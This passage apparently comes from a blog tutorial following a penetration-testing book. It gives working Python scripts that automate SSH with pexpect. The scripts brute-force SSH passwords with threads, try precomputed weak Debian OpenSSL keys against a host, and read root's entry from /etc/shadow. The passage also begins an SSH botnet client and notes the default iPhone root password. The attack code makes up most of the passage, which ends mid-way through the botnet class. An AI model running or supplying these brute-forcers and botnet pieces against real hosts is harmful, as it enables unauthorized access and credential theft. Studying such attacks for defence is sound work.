<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span>
    <span class="c1"># The host-key question continues on the same line, so the pattern must not end in a newline</span>
    <span class="n">ssh_new_key</span> <span class="o">=</span> <span class="s">"Are you sure you want to continue connecting"</span>
    <span class="n">conn_str</span> <span class="o">=</span> <span class="s">"ssh {}@{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">)</span>
    <span class="n">child</span> <span class="o">=</span> <span class="n">pexpect</span><span class="p">.</span><span class="n">spawn</span><span class="p">(</span><span class="n">conn_str</span><span class="p">)</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">([</span><span class="n">pexpect</span><span class="p">.</span><span class="n">TIMEOUT</span><span class="p">,</span> <span class="n">ssh_new_key</span><span class="p">,</span> <span class="s">"{}@{}'s password:"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">)])</span>

    <span class="k">if</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Error Connecting"</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="c1"># Unknown host key: accept it, then wait for the password prompt</span>
        <span class="n">child</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"yes"</span><span class="p">)</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">([</span><span class="n">pexpect</span><span class="p">.</span><span class="n">TIMEOUT</span><span class="p">,</span> <span class="s">"[Pp]assword:"</span><span class="p">])</span>
        <span class="k">if</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Error Connecting"</span><span class="p">)</span>
            <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="c1"># Reached both when the host key was already known and after accepting a new one</span>
    <span class="n">child</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">password</span><span class="p">)</span>
    <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">(</span><span class="n">PROMPT</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">child</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">child</span> <span class="o">=</span> <span class="n">connect</span><span class="p">(</span><span class="s">"root"</span><span class="p">,</span> <span class="s">"192.168.158.157"</span><span class="p">,</span> <span class="s">"toor"</span><span class="p">)</span>
    <span class="n">send_command</span><span class="p">(</span><span class="n">child</span><span class="p">,</span> <span class="s">"cat /etc/shadow | grep root"</span><span class="p">)</span>
</code></pre></div></div>
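<p>The entries in <code class="language-plaintext highlighter-rouge">PROMPT</code> are regular expressions, which is why the dollar sign has to be escaped. The sketch below is a simplified stand-in for how a list of patterns is matched against the output read so far. It is written with the standard <code class="language-plaintext highlighter-rouge">re</code> module only and is not Pexpect's own code. It assumes the documented rule that the earliest match in the stream wins and ties go to the pattern listed first. The function name <code class="language-plaintext highlighter-rouge">first_match</code> is made up.</p>

```python
import re

PROMPT = ["# ", ">>> ", "> ", r"\$ "]


def first_match(patterns, text):
    """Return the index of the pattern that matches earliest in text, or -1."""
    hits = []
    for index, pattern in enumerate(patterns):
        match = re.search(pattern, text)
        if match:
            hits.append((match.start(), index))
    # Tuples compare by start offset first, then by position in the list.
    return min(hits)[1] if hits else -1


if __name__ == "__main__":
    print(first_match(PROMPT, "root@kali:~# "))
    print(first_match(PROMPT, "user@host:~$ "))
    # An unescaped "$ " means "end of input, then a space" and never matches.
    print(re.search("$ ", "user@host:~$ "))
```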

<h3 id="用-pxssh-暴力破解-ssh-密码">Brute-Forcing SSH Passwords with Pxssh</h3>

<p>Import Pxssh with: <code class="language-plaintext highlighter-rouge">import pexpect.pxssh</code></p>

<p>Pxssh is a specialized module bundled with the <code class="language-plaintext highlighter-rouge">pexpect</code> library. It provides ready-made <code class="language-plaintext highlighter-rouge">login()</code>, <code class="language-plaintext highlighter-rouge">logout()</code>, and <code class="language-plaintext highlighter-rouge">prompt()</code> functions for interacting with <code class="language-plaintext highlighter-rouge">SSH</code> directly.</p>

<p>Note: the code below implements only the connection step, and it still failed to connect for the same reason as above.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pexpect.pxssh</span> <span class="k">as</span> <span class="n">pxssh</span>
<span class="kn">import</span> <span class="nn">traceback</span>

<span class="k">def</span> <span class="nf">send_command</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="n">s</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">prompt</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">before</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">s</span> <span class="o">=</span> <span class="n">pxssh</span><span class="p">.</span><span class="n">pxssh</span><span class="p">()</span>
        <span class="n">s</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">s</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="n">traceback</span><span class="p">.</span><span class="n">print_exc</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Error Connecting"</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">ssh</span> <span class="o">=</span> <span class="n">connect</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="s">"root"</span><span class="p">,</span> <span class="s">"Lin982674"</span><span class="p">)</span>
    <span class="n">send_command</span><span class="p">(</span><span class="n">ssh</span><span class="p">,</span> <span class="s">"cat /etc/shadow | grep root"</span><span class="p">)</span>
</code></pre></div></div>

<p>A small change to <code class="language-plaintext highlighter-rouge">connect()</code> is enough to turn it into a brute-forcer. If the exception mentions <code class="language-plaintext highlighter-rouge">read_nonblocking</code>, the SSH server has probably been overwhelmed by too many connections; if the exception says that <code class="language-plaintext highlighter-rouge">pxssh</code> had trouble obtaining the command prompt, wait a moment and try again. Because this <code class="language-plaintext highlighter-rouge">connect()</code> can call itself recursively, only a <code class="language-plaintext highlighter-rouge">connect()</code> call that was not made recursively from another <code class="language-plaintext highlighter-rouge">connect()</code> may release the <code class="language-plaintext highlighter-rouge">connection_lock</code> semaphore. The final script given in the book is as follows:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pexpect.pxssh</span> <span class="k">as</span> <span class="n">pxssh</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">threading</span>

<span class="n">max_connections</span> <span class="o">=</span> <span class="mi">5</span>
<span class="n">connection_lock</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="n">max_connections</span><span class="p">)</span>
<span class="n">found</span> <span class="o">=</span> <span class="bp">False</span>
<span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span>

<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">release</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">found</span><span class="p">,</span> <span class="n">fails</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">s</span> <span class="o">=</span> <span class="n">pxssh</span><span class="p">.</span><span class="n">pxssh</span><span class="p">()</span>
        <span class="n">s</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Password Found: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
        <span class="n">found</span> <span class="o">=</span> <span class="bp">True</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">if</span> <span class="s">"read_nonblocking"</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">):</span>
            <span class="n">fails</span> <span class="o">+=</span> <span class="mi">1</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
            <span class="n">connect</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
        <span class="k">elif</span> <span class="s">"synchronize with original prompt"</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">):</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
            <span class="n">connect</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
    <span class="k">finally</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">release</span><span class="p">:</span>
            <span class="n">connection_lock</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -H &lt;target host&gt; -u &lt;user&gt; -F &lt;password list&gt;"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-H"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_host"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target host"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-F"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"password_file"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify password file"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-u"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"user"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify the user"</span><span class="p">)</span>

    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">target_host</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">target_host</span>
    <span class="n">password_file</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">password_file</span>
    <span class="n">user</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">user</span>

    <span class="k">if</span> <span class="n">target_host</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">password_file</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">user</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">password_file</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">f</span><span class="p">.</span><span class="n">readlines</span><span class="p">():</span>
            <span class="k">if</span> <span class="n">found</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[*] Exiting: Password Found"</span><span class="p">)</span>
                <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">fails</span> <span class="o">&gt;</span> <span class="mi">5</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[!] Exiting: Too Many Socket Timeouts"</span><span class="p">)</span>
                <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
            <span class="n">connection_lock</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
            <span class="n">password</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">strip</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Testing: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
            <span class="n">t</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">connect</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="bp">True</span><span class="p">))</span>
            <span class="n">t</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>
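<p>The concurrency limit in the script comes entirely from the <code class="language-plaintext highlighter-rouge">BoundedSemaphore</code>: the main loop acquires a slot before starting each thread, and the thread gives the slot back when it finishes. The sketch below isolates that pattern with a dummy worker that only sleeps, so it makes no connections. The <code class="language-plaintext highlighter-rouge">stats</code> bookkeeping and the <code class="language-plaintext highlighter-rouge">worker</code> and <code class="language-plaintext highlighter-rouge">run</code> names are additions for the illustration.</p>

```python
import threading
import time

max_connections = 5
connection_lock = threading.BoundedSemaphore(value=max_connections)
stats_lock = threading.Lock()
stats = {"active": 0, "peak": 0}


def worker():
    try:
        with stats_lock:
            stats["active"] += 1
            stats["peak"] = max(stats["peak"], stats["active"])
        time.sleep(0.01)  # stand-in for the real work
    finally:
        with stats_lock:
            stats["active"] -= 1
        # Give the slot back so the main loop can start another worker.
        connection_lock.release()


def run(jobs):
    threads = []
    for _ in range(jobs):
        # Blocks while max_connections workers already hold a slot.
        connection_lock.acquire()
        thread = threading.Thread(target=worker)
        thread.start()
        threads.append(thread)
    for thread in threads:
        thread.join()
    return stats["peak"]
```

<p>However many jobs are queued, the value returned by <code class="language-plaintext highlighter-rouge">run()</code> should never exceed <code class="language-plaintext highlighter-rouge">max_connections</code>.</p>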

<p>On an iPhone, the default password for the root user is <code class="language-plaintext highlighter-rouge">alpine</code>. After jailbreaking a device, users typically enable an OpenSSH service on it.</p>

<h3 id="利用-ssh-中的弱私钥">Exploiting Weak SSH Private Keys</h3>

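<p>Password authentication is not the only option for an SSH server. SSH can also authenticate with public-key cryptography, in which the server holds the public key and the user holds the private key. Using either the RSA or the DSA algorithm, the server can generate the keys used for SSH login.</p>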

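<p>In 2006, however, something interesting happened in the Debian Linux distribution. A developer commented out a line of code that an automated software analysis tool had flagged. That line was what ensured enough entropy went into creating SSH keys. With it commented out, the entropy of the key space dropped to only 15 bits, which left just 32,767 possible keys for each algorithm and key size. HD Moore, CSO of Rapid7, generated all of the possible 1024-bit and 2048-bit keys in under two hours and published the results <a href="http://digitaloffense.net/tools/debianopenssl/">online</a>, where anyone can download them.</p>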
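<p>The 15-bit figure can be checked with a few lines of arithmetic. The sketch assumes, as is commonly reported for this bug, that the process ID was the only input that still varied between key generations and that PIDs range from 1 to 32,767. The <code class="language-plaintext highlighter-rouge">attempts_per_second</code> value is a made-up rate used only to show the scale of the search.</p>

```python
import math

max_pid = 2 ** 15 - 1        # assumed PID range 1..32767
keys_per_variant = max_pid   # one candidate key per PID, for a given algorithm and key size
entropy_bits = math.log2(keys_per_variant)

attempts_per_second = 5      # hypothetical rate, for illustration only
hours = keys_per_variant / attempts_per_second / 3600

print(keys_per_variant, round(entropy_bits, 2), round(hours, 1))
```

<p>A key space this small can be enumerated completely, which is what makes the precomputed key sets practical.</p>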

<p>This makes a brute-force attack feasible. To log in to SSH with a key, run a command of the form <code class="language-plaintext highlighter-rouge">ssh user@host -i keyfile -o PasswordAuthentication=no</code>. The demo code is as follows:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pexpect</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">threading</span>

<span class="n">max_connections</span> <span class="o">=</span> <span class="mi">5</span>
<span class="n">connection_lock</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="n">max_connections</span><span class="p">)</span>
<span class="n">stop</span> <span class="o">=</span> <span class="bp">False</span>
<span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span>

<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">key_file</span><span class="p">,</span> <span class="n">release</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">stop</span><span class="p">,</span> <span class="n">fails</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">perm_denied</span> <span class="o">=</span> <span class="s">"Permission denied"</span>
        <span class="n">ssh_new_key</span> <span class="o">=</span> <span class="s">"Are you sure you want to continue"</span>
        <span class="n">conn_closed</span> <span class="o">=</span> <span class="s">"Connection closed by remote host"</span>

        <span class="n">opt</span> <span class="o">=</span> <span class="s">" -o PasswordAuthentication=no"</span>
        <span class="n">conn_str</span> <span class="o">=</span> <span class="s">"ssh {}@{} -i {}{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">key_file</span><span class="p">,</span> <span class="n">opt</span><span class="p">)</span>
        <span class="n">child</span> <span class="o">=</span> <span class="n">pexpect</span><span class="p">.</span><span class="n">spawn</span><span class="p">(</span><span class="n">conn_str</span><span class="p">)</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">([</span><span class="n">pexpect</span><span class="p">.</span><span class="n">TIMEOUT</span><span class="p">,</span> <span class="n">perm_denied</span><span class="p">,</span> <span class="n">ssh_new_key</span><span class="p">,</span> <span class="n">conn_closed</span><span class="p">,</span> <span class="s">"$"</span><span class="p">,</span> <span class="s">"#"</span><span class="p">,</span> <span class="p">])</span>
        <span class="k">if</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Adding Host to ~/.ssh/known_hosts"</span><span class="p">)</span>
            <span class="n">child</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"yes"</span><span class="p">)</span>
            <span class="n">connect</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">key_file</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
        <span class="k">elif</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Connection Closed By Remote Host"</span><span class="p">)</span>
            <span class="n">fails</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="k">elif</span> <span class="n">ret</span> <span class="o">&gt;</span> <span class="mi">3</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Success. {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">key_file</span><span class="p">))</span>
            <span class="n">stop</span> <span class="o">=</span> <span class="bp">True</span>
    <span class="k">finally</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">release</span><span class="p">:</span>
            <span class="n">connection_lock</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -H &lt;target_host&gt; -u &lt;user&gt; -d &lt;directory&gt;"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-H"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_host"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target host"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-d"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"pass_dir"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify directory with keys"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-u"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"user"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify the user"</span><span class="p">)</span>

    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">target_host</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">target_host</span>
    <span class="n">pass_dir</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">pass_dir</span>
    <span class="n">user</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">user</span>

    <span class="k">if</span> <span class="n">target_host</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">pass_dir</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">user</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">file_name</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">pass_dir</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">stop</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Exiting: Key Found."</span><span class="p">)</span>
            <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">fails</span> <span class="o">&gt;</span> <span class="mi">5</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[!] Exiting: Too Many Connections Closed By Remote Host."</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[!] Adjust number of simultaneous threads."</span><span class="p">)</span>
            <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
        <span class="n">connection_lock</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>

        <span class="n">full_path</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">pass_dir</span><span class="p">,</span> <span class="n">file_name</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Testing keyfile {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">full_path</span><span class="p">))</span>
        <span class="n">t</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">connect</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">full_path</span><span class="p">,</span> <span class="bp">True</span><span class="p">))</span>
        <span class="n">t</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>
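
<p>The script above caps the number of simultaneous threads with <code class="language-plaintext highlighter-rouge">threading.BoundedSemaphore</code>. The sketch below isolates that pattern with a placeholder task that only sleeps. <code class="language-plaintext highlighter-rouge">worker</code>, <code class="language-plaintext highlighter-rouge">run_all</code>, and the <code class="language-plaintext highlighter-rouge">active</code>/<code class="language-plaintext highlighter-rouge">peak</code> counters are hypothetical names introduced for illustration. The main thread acquires a slot before starting each thread, and the thread releases it in <code class="language-plaintext highlighter-rouge">finally</code>, so a slot is returned even if the task raises.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import threading
import time

MAX_WORKERS = 5  # plays the role of max_connections in the script above
slots = threading.BoundedSemaphore(value=MAX_WORKERS)
state_lock = threading.Lock()
active = 0  # tasks currently running
peak = 0    # highest value active has reached


def worker(task_id):
    """Hypothetical placeholder task: sleeps instead of doing real work."""
    global active, peak
    try:
        with state_lock:
            active += 1
            peak = max(peak, active)
        time.sleep(0.01)
    finally:
        with state_lock:
            active -= 1
        slots.release()  # free the slot even if the task raised


def run_all(task_count):
    """Start task_count workers and return the peak concurrency observed."""
    threads = []
    for task_id in range(task_count):
        slots.acquire()  # blocks while MAX_WORKERS tasks are running
        t = threading.Thread(target=worker, args=(task_id,))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
    return peak


print(run_all(20))  # never more than MAX_WORKERS
</code></pre></div></div>

<p>Because <code class="language-plaintext highlighter-rouge">acquire()</code> happens in the main loop, the loop itself stalls once all slots are taken, which is what keeps the thread count bounded.</p>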

<h3 id="构建-ssh-僵尸网络">Building an SSH Botnet</h3>

<p>Each individual bot, or client, needs to be able to connect to a compromised host and send commands to it.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">pexpect.pxssh</span> <span class="k">as</span> <span class="n">pxssh</span>

<span class="n">bot_net</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>

<span class="k">class</span> <span class="nc">Client</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">host</span> <span class="o">=</span> <span class="n">host</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">user</span> <span class="o">=</span> <span class="n">user</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">password</span> <span class="o">=</span> <span class="n">password</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">session</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">connect</span><span class="p">()</span>

    <span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">s</span> <span class="o">=</span> <span class="n">pxssh</span><span class="p">.</span><span class="n">pxssh</span><span class="p">()</span>
            <span class="n">s</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">host</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">user</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">password</span><span class="p">)</span>
            <span class="k">return</span> <span class="n">s</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Error Connecting"</span><span class="p">)</span>

